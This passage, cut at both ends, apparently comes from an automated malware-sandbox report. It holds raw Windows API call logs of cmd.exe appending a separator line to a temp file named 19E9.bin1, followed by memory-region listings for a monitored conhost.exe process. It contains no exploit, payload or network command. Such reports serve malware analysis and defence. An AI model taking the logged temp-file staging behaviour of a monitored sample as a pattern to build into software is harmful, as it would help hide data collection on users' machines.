lpAddress=0xb4ee40f814, lpBuffer=0xb4ee40f790, dwLength=0x30 | out: lpBuffer=0xb4ee40f790*(BaseAddress=0xb4ee40f000, AllocationBase=0xb4ee310000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0276.322] VirtualQuery (in: lpAddress=0xb4ee310000, lpBuffer=0xb4ee40f790, dwLength=0x30 | out: lpBuffer=0xb4ee40f790*(BaseAddress=0xb4ee310000, AllocationBase=0xb4ee310000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0276.322] VirtualQuery (in: lpAddress=0xb4ee311000, lpBuffer=0xb4ee40f790, dwLength=0x30 | out: lpBuffer=0xb4ee40f790*(BaseAddress=0xb4ee311000, AllocationBase=0xb4ee310000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0276.322] VirtualQuery (in: lpAddress=0xb4ee314000, lpBuffer=0xb4ee40f790, dwLength=0x30 | out: lpBuffer=0xb4ee40f790*(BaseAddress=0xb4ee314000, AllocationBase=0xb4ee310000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30 [0276.322] VirtualQuery (in: lpAddress=0xb4ee410000, lpBuffer=0xb4ee40f790, dwLength=0x30 | out: lpBuffer=0xb4ee40f790*(BaseAddress=0xb4ee410000, AllocationBase=0xb4ee410000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0xffffd000)) returned 0x30 [0276.322] GetConsoleOutputCP () returned 0x1b5 [0276.323] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff60d9f8640 | out: lpCPInfo=0x7ff60d9f8640) returned 1 [0276.323] SetConsoleCtrlHandler (HandlerRoutine=0x7ff60d9e15d0, Add=1) returned 1 [0276.323] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.323] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x0) returned 1 [0276.323] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.323] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff60d9f85ec | out: lpMode=0x7ff60d9f85ec) returned 1 [0276.323] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.323] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x3) returned 1 [0276.324] _get_osfhandle (_FileHandle=0) returned 0x20 [0276.324] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff60d9f85e8 | out: lpMode=0x7ff60d9f85e8) returned 1 [0276.324] _get_osfhandle (_FileHandle=0) returned 0x20 [0276.324] SetConsoleMode (hConsoleHandle=0x20, dwMode=0x1e7) returned 1 [0276.324] GetEnvironmentStringsW () returned 0xb4ee5556b0* [0276.324] FreeEnvironmentStringsA (penv="=") returned 1 [0276.324] GetEnvironmentStringsW () returned 0xb4ee5556b0* [0276.325] FreeEnvironmentStringsA (penv="=") returned 1 [0276.325] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xb4ee40e6d8 | out: phkResult=0xb4ee40e6d8*=0x78) returned 0x0 [0276.325] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xb4ee40e6d0, lpData=0xb4ee40e6f0, lpcbData=0xb4ee40e6d4*=0x1000 | out: lpType=0xb4ee40e6d0*=0x0, lpData=0xb4ee40e6f0*=0x1, lpcbData=0xb4ee40e6d4*=0x1000) returned 0x2 [0276.325] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xb4ee40e6d0, lpData=0xb4ee40e6f0, lpcbData=0xb4ee40e6d4*=0x1000 | out: lpType=0xb4ee40e6d0*=0x4, lpData=0xb4ee40e6f0*=0x1, lpcbData=0xb4ee40e6d4*=0x4) returned 0x0 [0276.325] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xb4ee40e6d0, lpData=0xb4ee40e6f0, lpcbData=0xb4ee40e6d4*=0x1000 | out: lpType=0xb4ee40e6d0*=0x0, lpData=0xb4ee40e6f0*=0x1, lpcbData=0xb4ee40e6d4*=0x1000) returned 0x2 [0276.325] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xb4ee40e6d0, lpData=0xb4ee40e6f0, lpcbData=0xb4ee40e6d4*=0x1000 | out: lpType=0xb4ee40e6d0*=0x4, lpData=0xb4ee40e6f0*=0x0, lpcbData=0xb4ee40e6d4*=0x4) returned 0x0 [0276.325] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xb4ee40e6d0, lpData=0xb4ee40e6f0, lpcbData=0xb4ee40e6d4*=0x1000 | out: lpType=0xb4ee40e6d0*=0x4, lpData=0xb4ee40e6f0*=0x40, lpcbData=0xb4ee40e6d4*=0x4) returned 0x0 [0276.325] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xb4ee40e6d0, lpData=0xb4ee40e6f0, lpcbData=0xb4ee40e6d4*=0x1000 | out: lpType=0xb4ee40e6d0*=0x4, lpData=0xb4ee40e6f0*=0x40, lpcbData=0xb4ee40e6d4*=0x4) returned 0x0 [0276.325] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0xb4ee40e6d0, lpData=0xb4ee40e6f0, lpcbData=0xb4ee40e6d4*=0x1000 | out: lpType=0xb4ee40e6d0*=0x0, lpData=0xb4ee40e6f0*=0x40, lpcbData=0xb4ee40e6d4*=0x1000) returned 0x2 [0276.325] RegCloseKey (hKey=0x78) returned 0x0 [0276.325] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0xb4ee40e6d8 | out: phkResult=0xb4ee40e6d8*=0x78) returned 0x0 [0276.325] RegQueryValueExW (in: hKey=0x78, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0xb4ee40e6d0, lpData=0xb4ee40e6f0, lpcbData=0xb4ee40e6d4*=0x1000 | out: lpType=0xb4ee40e6d0*=0x0, lpData=0xb4ee40e6f0*=0x40, lpcbData=0xb4ee40e6d4*=0x1000) returned 0x2 [0276.325] RegQueryValueExW (in: hKey=0x78, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0xb4ee40e6d0, lpData=0xb4ee40e6f0, lpcbData=0xb4ee40e6d4*=0x1000 | out: lpType=0xb4ee40e6d0*=0x4, lpData=0xb4ee40e6f0*=0x1, lpcbData=0xb4ee40e6d4*=0x4) returned 0x0 [0276.325] RegQueryValueExW (in: hKey=0x78, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0xb4ee40e6d0, lpData=0xb4ee40e6f0, lpcbData=0xb4ee40e6d4*=0x1000 | out: lpType=0xb4ee40e6d0*=0x0, lpData=0xb4ee40e6f0*=0x1, lpcbData=0xb4ee40e6d4*=0x1000) returned 0x2 [0276.325] RegQueryValueExW (in: hKey=0x78, lpValueName="DefaultColor", lpReserved=0x0, lpType=0xb4ee40e6d0, lpData=0xb4ee40e6f0, lpcbData=0xb4ee40e6d4*=0x1000 | out: lpType=0xb4ee40e6d0*=0x4, lpData=0xb4ee40e6f0*=0x0, lpcbData=0xb4ee40e6d4*=0x4) returned 0x0 [0276.325] RegQueryValueExW (in: hKey=0x78, lpValueName="CompletionChar", lpReserved=0x0, lpType=0xb4ee40e6d0, lpData=0xb4ee40e6f0, lpcbData=0xb4ee40e6d4*=0x1000 | out: lpType=0xb4ee40e6d0*=0x4, lpData=0xb4ee40e6f0*=0x9, lpcbData=0xb4ee40e6d4*=0x4) returned 0x0 [0276.325] RegQueryValueExW (in: hKey=0x78, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0xb4ee40e6d0, lpData=0xb4ee40e6f0, lpcbData=0xb4ee40e6d4*=0x1000 | out: lpType=0xb4ee40e6d0*=0x4, lpData=0xb4ee40e6f0*=0x9, lpcbData=0xb4ee40e6d4*=0x4) returned 0x0 [0276.325] RegQueryValueExW (in: hKey=0x78, lpValueName="AutoRun", lpReserved=0x0, lpType=0xb4ee40e6d0, lpData=0xb4ee40e6f0, lpcbData=0xb4ee40e6d4*=0x1000 | out: lpType=0xb4ee40e6d0*=0x0, lpData=0xb4ee40e6f0*=0x9, lpcbData=0xb4ee40e6d4*=0x1000) returned 0x2 [0276.325] RegCloseKey (hKey=0x78) returned 0x0 [0276.326] time (in: timer=0x0 | out: timer=0x0) returned 0x5be0e013 [0276.326] srand (_Seed=0x5be0e013) [0276.326] GetCommandLineW () returned="cmd /C \"echo -------- >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"" [0276.326] GetCommandLineW () returned="cmd /C \"echo -------- >> C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1\"" [0276.326] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff60da00920 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0276.326] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xb4ee557820, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0276.326] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0276.326] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0276.326] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0276.326] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0276.326] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0276.326] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0276.326] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0276.326] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0276.326] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0276.326] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0276.326] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0276.326] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0276.327] GetEnvironmentStringsW () returned 0xb4ee5556b0* [0276.327] FreeEnvironmentStringsA (penv="=") returned 1 [0276.327] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0276.327] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x7ff60d9f8680, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0276.327] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0276.327] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0276.327] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0276.327] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0276.327] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0276.327] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0276.327] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0276.327] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0276.327] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xb4ee40f4e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0276.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0xb4ee40f4e0, lpFilePart=0xb4ee40f4c0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0xb4ee40f4c0*="system32") returned 0x13 [0276.328] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0276.328] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0xb4ee40f1f0 | out: lpFindFileData=0xb4ee40f1f0) returned 0xb4ee550720 [0276.329] FindClose (in: hFindFile=0xb4ee550720 | out: hFindFile=0xb4ee550720) returned 1 [0276.329] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0xb4ee40f1f0 | out: lpFindFileData=0xb4ee40f1f0) returned 0xb4ee550720 [0276.329] FindClose (in: hFindFile=0xb4ee550720 | out: hFindFile=0xb4ee550720) returned 1 [0276.329] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0276.329] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0276.330] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0276.330] GetEnvironmentStringsW () returned 0xb4ee557a30* [0276.330] FreeEnvironmentStringsA (penv="=") returned 1 [0276.330] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x7ff60da00920 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0276.331] GetConsoleOutputCP () returned 0x1b5 [0276.331] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff60d9f8640 | out: lpCPInfo=0x7ff60d9f8640) returned 1 [0276.331] GetUserDefaultLCID () returned 0x409 [0276.331] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x7ff60d9fc680, cchData=8 | out: lpLCData=":") returned 2 [0276.331] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xb4ee40f610, cchData=128 | out: lpLCData="0") returned 2 [0276.331] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xb4ee40f610, cchData=128 | out: lpLCData="0") returned 2 [0276.331] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xb4ee40f610, cchData=128 | out: lpLCData="1") returned 2 [0276.331] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x7ff60d9fc690, cchData=8 | out: lpLCData="/") returned 2 [0276.332] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff60d9fc6e0, cchData=32 | out: lpLCData="Mon") returned 4 [0276.332] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff60d9fc720, cchData=32 | out: lpLCData="Tue") returned 4 [0276.332] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff60d9fc760, cchData=32 | out: lpLCData="Wed") returned 4 [0276.332] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff60d9fc7a0, cchData=32 | out: lpLCData="Thu") returned 4 [0276.332] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff60d9fc7e0, cchData=32 | out: lpLCData="Fri") returned 4 [0276.332] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff60d9fc820, cchData=32 | out: lpLCData="Sat") returned 4 [0276.332] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff60d9fc860, cchData=32 | out: lpLCData="Sun") returned 4 [0276.332] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff60d9fc6a0, cchData=8 | out: lpLCData=".") returned 2 [0276.332] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff60d9fc6c0, cchData=8 | out: lpLCData=",") returned 2 [0276.332] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0276.333] GetConsoleTitleW (in: lpConsoleTitle=0xb4ee5510b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0276.333] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ff977ab0000 [0276.333] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="CopyFileExW") returned 0x7ff977ad25e0 [0276.333] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="IsDebuggerPresent") returned 0x7ff977ad1f90 [0276.333] GetProcAddress (hModule=0x7ff977ab0000, lpProcName="SetConsoleInputExeNameW") returned 0x7ff975423a10 [0276.334] _wcsicmp (_String1="echo", _String2=")") returned 60 [0276.334] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0276.334] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0276.334] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0276.334] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0276.334] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0276.334] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0276.337] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.337] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.337] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.337] GetFileType (hFile=0x24) returned 0x2 [0276.337] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0276.337] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xb4ee40f4d8 | out: lpMode=0xb4ee40f4d8) returned 1 [0276.338] _dup (_FileHandle=1) returned 3 [0276.338] _close (_FileHandle=1) returned 0 [0276.338] _wcsicmp (_String1="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1", _String2="con") returned -53 [0276.338] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\19E9.bin1" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\19e9.bin1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0xb4ee40f470, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x24 [0276.338] _open_osfhandle (_OSFileHandle=0x24, _Flags=8) returned 1 [0276.338] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.338] GetFileType (hFile=0x24) returned 0x1 [0276.338] GetFileSize (in: hFile=0x24, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x857 [0276.339] SetFilePointer (in: hFile=0x24, lDistanceToMove=-1, lpDistanceToMoveHigh=0xb4ee40f4d8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0xb4ee40f4d8*=0) returned 0x856 [0276.339] ReadFile (in: hFile=0x24, lpBuffer=0xb4ee40f4e0, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0xb4ee40f4e8, lpOverlapped=0x0 | out: lpBuffer=0xb4ee40f4e0*, lpNumberOfBytesRead=0xb4ee40f4e8*=0x1, lpOverlapped=0x0) returned 1 [0276.339] GetConsoleTitleW (in: lpConsoleTitle=0xb4ee40f500, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0276.339] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0276.339] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0276.339] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0276.339] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0276.339] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0276.339] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0276.339] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0276.339] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0276.339] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0276.339] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0276.341] _vsnwprintf (in: _Buffer=0x7ff60da00b40, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0xb4ee40f298 | out: _Buffer="-------- \r\n") returned 11 [0276.341] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.341] GetFileType (hFile=0x24) returned 0x1 [0276.341] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.341] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="-------- \r\n", cchWideChar=-1, lpMultiByteStr=0x7ff60da04b60, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-------- \r\n", lpUsedDefaultChar=0x0) returned 12 [0276.341] WriteFile (in: hFile=0x24, lpBuffer=0x7ff60da04b60*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0xb4ee40f258, lpOverlapped=0x0 | out: lpBuffer=0x7ff60da04b60*, lpNumberOfBytesWritten=0xb4ee40f258*=0xb, lpOverlapped=0x0) returned 1 [0276.341] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0276.381] _close (_FileHandle=3) returned 0 [0276.381] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.381] SetConsoleMode (hConsoleHandle=0x24, dwMode=0x3) returned 1 [0276.381] _get_osfhandle (_FileHandle=1) returned 0x24 [0276.381] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7ff60d9f85ec | out: lpMode=0x7ff60d9f85ec) returned 1 [0276.382] _get_osfhandle (_FileHandle=0) returned 0x20 [0276.382] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff60d9f85e8 | out: lpMode=0x7ff60d9f85e8) returned 1 [0276.382] SetConsoleInputExeNameW () returned 0x1 [0276.382] GetConsoleOutputCP () returned 0x1b5 [0276.382] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff60d9f8640 | out: lpCPInfo=0x7ff60d9f8640) returned 1 [0276.383] SetThreadUILanguage (LangId=0x0) returned 0x409 [0276.383] exit (_Code=0) Thread: id = 257 os_tid = 0x120 Process: id = "30" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x3cc7d000" os_pid = "0x2b8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0x86c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00018e8d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2873 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2874 start_va = 0x9e1af00000 end_va = 0x9e1af1ffff entry_point = 0x0 region_type = private name = "private_0x0000009e1af00000" filename = "" Region: id = 2875 start_va = 0x9e1af20000 end_va = 0x9e1af33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009e1af20000" filename = "" Region: id = 2876 start_va = 0x9e1af40000 end_va = 0x9e1af7ffff entry_point = 0x0 region_type = private name = "private_0x0000009e1af40000" filename = "" Region: id = 2877 start_va = 0x7df5ff240000 end_va = 0x7ff5ff23ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff240000" filename = "" Region: id = 2878 start_va = 0x7ff683ae0000 end_va = 0x7ff683b02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff683ae0000" filename = "" Region: id = 2879 start_va = 0x7ff683b0a000 end_va = 0x7ff683b0afff entry_point = 0x0 region_type = private name = "private_0x00007ff683b0a000" filename = "" Region: id = 2880 start_va = 0x7ff683b0e000 end_va = 0x7ff683b0ffff entry_point = 0x0 region_type = private name = "private_0x00007ff683b0e000" filename = "" Region: id = 2881 start_va = 0x7ff6847f0000 end_va = 0x7ff684800fff entry_point = 0x7ff6847f0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 2882 start_va = 0x7ff977f30000 end_va = 0x7ff9780f1fff entry_point = 0x7ff977f30000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2883 start_va = 0x9e1b100000 end_va = 0x9e1b1fffff entry_point = 0x0 region_type = private name = "private_0x0000009e1b100000" filename = "" Region: id = 2884 start_va = 0x7ff9753d0000 end_va = 0x7ff9755acfff entry_point = 0x7ff9753d0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2885 start_va = 0x7ff977ab0000 end_va = 0x7ff977b5cfff entry_point = 0x7ff977ab0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2886 start_va = 0x9e1af00000 end_va = 0x9e1af0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009e1af00000" filename = "" Region: id = 2887 start_va = 0x9e1af10000 end_va = 0x9e1af16fff entry_point = 0x0 region_type = private name = "private_0x0000009e1af10000" filename = "" Region: id = 2888 start_va = 0x9e1af80000 end_va = 0x9e1b03dfff entry_point = 0x9e1af80000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2889 start_va = 0x9e1b040000 end_va = 0x9e1b07ffff entry_point = 0x0 region_type = private name = "private_0x0000009e1b040000" filename = "" Region: id = 2890 start_va = 0x9e1b080000 end_va = 0x9e1b080fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009e1b080000" filename = "" Region: id = 2891 start_va = 0x9e1b090000 end_va = 0x9e1b096fff entry_point = 0x0 region_type = private name = "private_0x0000009e1b090000" filename = "" Region: id = 2892 start_va = 0x9e1b0a0000 end_va = 0x9e1b0a0fff entry_point = 0x0 region_type = private name = "private_0x0000009e1b0a0000" filename = "" Region: id = 2893 start_va = 0x9e1b0b0000 end_va = 0x9e1b0b0fff entry_point = 0x0 region_type = private name = "private_0x0000009e1b0b0000" filename = "" Region: id = 2894 start_va = 0x9e1b2f0000 end_va = 0x9e1b2fffff entry_point = 0x0 region_type = private name = "private_0x0000009e1b2f0000" filename = "" Region: id = 2895 start_va = 0x9e1b300000 end_va = 0x9e1b487fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009e1b300000" filename = "" Region: id = 2896 start_va = 0x9e1b490000 end_va = 0x9e1b610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009e1b490000" filename = "" Region: id = 2897 start_va = 0x9e1b620000 end_va = 0x9e1ca1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009e1b620000" filename = "" Region: id = 2898 start_va = 0x7ff6839e0000 end_va = 0x7ff683adffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6839e0000" filename = "" Region: id = 2899 start_va = 0x7ff683b0c000 end_va = 0x7ff683b0dfff entry_point = 0x0 region_type = private name = "private_0x00007ff683b0c000" filename = "" Region: id = 2900 start_va = 0x7ff971180000 end_va = 0x7ff971302fff entry_point = 0x7ff971180000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2901 start_va = 0x7ff9722f0000 end_va = 0x7ff972342fff entry_point = 0x7ff9722f0000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 2902 start_va = 0x7ff9757b0000 end_va = 0x7ff9758fdfff entry_point = 0x7ff9757b0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2903 start_va = 0x7ff977200000 end_va = 0x7ff97735bfff entry_point = 0x7ff977200000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2904 start_va = 0x7ff9773c0000 end_va = 0x7ff97745cfff entry_point = 0x7ff9773c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2905 start_va = 0x7ff9774c0000 end_va = 0x7ff977644fff entry_point = 0x7ff9774c0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2906 start_va = 0x7ff9776c0000 end_va = 0x7ff97771afff entry_point = 0x7ff9776c0000 region_type = mapped_file name = "sechost.dll" filename = 